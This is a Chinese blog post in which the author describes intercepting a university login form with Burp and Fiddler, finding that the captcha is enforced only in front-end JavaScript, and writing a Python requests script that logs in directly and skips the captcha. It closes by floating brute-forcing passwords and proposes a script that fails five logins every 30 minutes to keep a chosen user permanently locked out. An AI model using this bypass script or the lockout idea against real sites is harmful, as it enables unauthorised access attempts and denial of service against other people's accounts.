我绕过验证的模拟登陆的崎岖倒流

由于好奇一直想试试模拟登陆,然后就把目标定在某所大学的登录网站上

大至样式就是这样的

通过界面我们大致可以了解到请求可能会后username,password,验证码,记住用户

 

接着使用burp进行抓包得:

可以通过post请求知道dlm就是uesrname,hexMd5是加密后的password(加密手段应该是MD5),cookie就是记住用户

...等等,怎么没有验证码,真奇怪,算了待会再看验证码把

 

通过浏览器中查看源码,得:

我们看出来dlmm是原始密码,而hexMd5是通过md5加密后的值

 

而后我的好奇心又回到了验证码上,源码显示:

哈哈哈,验证码居然在明面上,那简直太简单了,抓一下试试,代码如下:

1 import re
2 def reg_html(html):
3     parttern = re.compile(r'<input type="hid.*')    
4     yzm = parttern.findall(html)
5     return yzm

但结果也大失所望,抓到的value值为空,可能是我对前端知识不太了解,愿意坚持看下去

发现这个验证码调用了一个js的generateMixed函数

找到这个函数 得:

大致看明白了,别的还好说,关键这个random就让人没法弄啊。苦恼想放弃.....回家!

 

在路上,我问了一个师哥,我说我的post请求里没有验证码这是什么情况,他告诉我两种情况:

1 验证码在只是在前端作为一个check,可以绕过

2 验证码可能和用户密码等参数分着发过去了

我不解,回去用fiddler又做了一次抓包,post的数据中确实没有验证码,所以我猜想是第二种可能

于是我写了个脚本进行验证 代码如下:

 1 #!/usr/bin/env python
 2 #coding:utf-8
 3 
 4 import re
 5 import requests
 6 from bs4 import BeautifulSoup
 7 import hashlib
 8 
 9 URL = 'http://xxxxx.xxxxxx.edu.cn/login.login.action'                    #login_url
10 URL_p = 'http://xxxxx.xxxxxx.edu.cn/login.toStudentJsp.action?math=4636' #跳转url,可以通过js找到
11 URL_p2 = 'http://xxxxxx.xxxxxx.edu.cn/stumiddle.jsp'                      #user_info_url
12  
13 def md5Encode(string):
14     m = hashlib.md5()
15     m.update(string)
16     return m.hexdigest()
17  
18 def post_html(url,url2,url3):
19     session = requests.Session()
20     headers = {'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1581.2 Safari/537.36'}
21     payload = {'dlm':'xxxxxxxxxxxxxxx',
22                'hexMd5':'%s'%md5Encode('xxxxxxxxxxxxxx'),
23                'cookie':'0'
24                }
25     session.post(url,data=payload,headers=headers)
26     session.get(url2,headers=headers)
27     text = session.get(url3,headers=headers).text
28     return text
29 
30 def parser_html(html):
31     soup = BeautifulSoup(html,'html.parser')
32     return soup.prettify()
33     
34     
35 if __name__ == '__main__':
36     parser_html(post_html(URL,URL_p,URL_p2))

其中URL_p可以通过fiddler抓包得到或者通过js的跳转代码也可以找到,其中math=4636,如果看到js源码,这个就是js随机生成的一个4位数,可能为了标记每次的用户信息页面不一样吧

URL_p2通过fildder可以找到

 

运行这个脚本,如果我们的username或者password有错误,会返回这个text

但如果正确,则会get到正确页面,下图是上面脚本运行后,fiddler抓到的

模拟登陆成功了!,完全绕过了页面的验证码环节。

 

那么话说回来,既然有账号密码,我用的着这么麻烦,我个人认为有两方面原因

一是为了练习一下模拟登陆

二是可以 b r u t e  f o r c e 阿,但我有个不好的消息,这所大学的登录系统,如果5次尝试失败,会将username冻住30分钟。这真是杀敌一千自损八百啊,

但如果你要真想让这个用户崩,你可以写一个30钟登录5次的模拟登陆脚本,让该用户始终上不了。

 

haha,不聊了,看电视剧去了

 

posted @ 2016-10-26 15:24  fuzzier  阅读(5052)  评论(3编辑  收藏  举报